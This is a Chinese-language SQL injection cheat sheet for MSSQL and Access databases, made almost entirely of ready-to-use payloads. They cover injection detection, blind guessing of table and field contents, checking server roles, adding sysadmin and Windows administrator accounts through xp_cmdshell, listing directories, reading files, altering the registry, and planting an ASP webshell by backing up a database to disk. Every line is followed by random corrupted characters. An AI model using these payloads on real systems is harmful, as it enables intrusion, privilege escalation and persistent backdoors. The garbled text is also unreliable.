1.判断是否有注入;and 1=1 ;and 1=2 ��*�mH&Gn1
2.初步判断是否是mssql ;and user>0 &�@FufpPw/
�lL'Bo�p@
3.注入参数是字符'and [查询条件] and ''=' +:W/=C
d(h
ht#,v5oG>f
4.搜索时没过滤参数的'and [查询条件] and '%25'=' EeH�g�h�q�
@Ko#�n�DEq
5.判断数据库系统 HQ�wrb �HS
=d+`x��N�*
;and (select count(*) from sysobjects)>0 mssql 0"Euf4�1��
cc��3/XBo
;and (select count(*) from msysobjects)>0 access w�/:ib�G�@
T(,@]=d,DD
�V>`9�ey!U
5�`�@�yX[G
6.猜数据库 ;and (select Count(*) from [数据库名])>0 3,EtyJ3[Bh
n��a*Z�0y�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 \TYVAt]
�?
6v74mIRn'?
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 2I|���lY>Z
v}id/�brl
9.(1)猜字段的ascii值(access) f'�bwt�jO
~�����!�M"
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 );h������
XD"
4t4~�>
(2)猜字段的ascii值(mssql) @+1AY�Vz(k
6J_��$dz�w
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �Zu�ZCI�qN
D^a��(|L3;
10.测试权限结构(mssql) :wEy""�*N0
����q&}+O�
��i�9V��,
c$lZ\r�"
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �!��x\\# 9
.s?^�y+e_
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ��:��sw@�1
z`��e��M�b
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- GX�k
|�p8�
kk�W�}:dBl
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- R\Ckk;�<$�
,B /��b>i
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �8�Q�"1I7U
Q,Y^9g"B`~
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- E^A�!k��=>
�>v�R�2K^�
;and 1=(select IS_MEMBER('db_owner'));-- 6$k�h5�$�[
I0�><IaFy�
���ef!f4u\
t�v Zq):c
11.添加mssql和系统的帐户 lon�9oraF'
�-r]L� �MQ
;exec master.dbo.sp_addlogin username;-- 2Q7�X"ek~[
;exec master.dbo.sp_password null,username,password;-- a]Y��9;��(
2�<@g ��*�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �� -PU.Uw]
�gyPw�N�E
;exec master.dbo.xp_cmdshell 'net user username password B&B�L<�X
r
r��VRv�*W�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �
D��F=Rd#
gX$�gUB) x
;exec master.dbo.xp_cmdshell 'net user username password /add';-- m�s\\�R�@R
6!U��SSipn
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- gz��y|K%�K
]vPd��j"7�
Mt�tFB;T�p
%�mD{rG9��
12.(1)遍历目录 "c�?3�1$6
a8G<x����<
;create table dirs(paths varchar(100), id int) :t;i���2Ck
B9Wd
'���
;insert dirs exec master.dbo.xp_dirtree 'c:\' VS!�v7-_N5
I~�Qi):&x�
;and (select top 1 paths from dirs)>0 c4r9k-w0E
8H �T3C\$s
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) +F%tBUY�{<
Ct zW�do�.
.�J��J50�p
`I4E':
�ZG
(2)遍历目录 F�~hH�>BH9
pSE�aE9AX%
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �SSyARR+;c
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 'cAS>s"$}V
;j[:t�t�\k
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 5�R%y3::$S
���+EqL�|�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �0%Y}�CDn_
}f% Qk0�^
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 lDF7~�N9J_
R=$}u�DFmW
$9xp�@8b\_
e���.��#,9
13.mssql中的存储过程 �(d*�|�|�"
a;nY�R�5�f
xp_regenumvalues 注册表根键, 子键 WS?Y8�~+{5
?AQA�>D#W�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ts("(zI1E�
^�R�)�]_��
xp_regread 根键,子键,键值名 ��2$VS�H&�
��feeHXKD|
;exec xp_regread �1'iQlnMO@
QUfF>,[�sv
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 W�7@Vm�a`�
%`\Qtsap�e
xp_regwrite 根键,子键, 值名, 值类型, 值 �#��JY>���
��uq7/G�|
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ��^#K^W��V
s�kTtGz8R[
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 .7�:ecF�Kk
R9�D2cu,�{
xp_regdeletevalue 根键,子键,值名 rusYNb1��J
-w8?Ur1x�:
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 j~>J?w9�<O
&�.#dZ}J�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 h�?}�S|>9�
T�&bB�8tQk
�hd[t�&?{=
}odjaM}5Nc
14.mssql的backup创建webshell TDWD8??�e
�t]i�KU@�3
use model �%�K7;eP�u
Z!�jJ93�A"
create table cmd(str image); Ke�]'RfO\�
,^�<39ng�
insert into cmd(str) values (''); %K06owV(S)
+Jn\�`4/J:
backup database model to disk='c:\l.asp'; 0ia-D�`^me
v6E5#pse8
g:U
-kK!i
yS�[�HYq��
15.mssql内置函数 I�j��XxH]2
,_D@gg��L-
;and (select @@version)>0 获得Windows的版本号 )7Qp9�Fx�o
�/11CC \��
;and user_name()='dbo' 判断当前系统的连接用户是不是sa q|IU+r:! 3
(?lT� @RY/
;and (select user_name())>0 爆当前系统的连接用户 �G�oy[P2m
+^J;i���c
;and (select db_name())>0 得到当前连接的数据库 '"�ze �Im~
5B8fz;l= B
jq�T�K�7�b
">S�1,rhgS
16.简洁的webshell �v�� |pHbX
aSJD'u4w.a
use model kho0@o+'�^
"gD��k?w��
create table cmd(str image); qg<�Y^��y�
:�<0lC��j�
insert into cmd(str) values (''); wyAh%�'�V
��p6)�6Gcx
backup database model to disk='g:\wwwtest\l.asp';
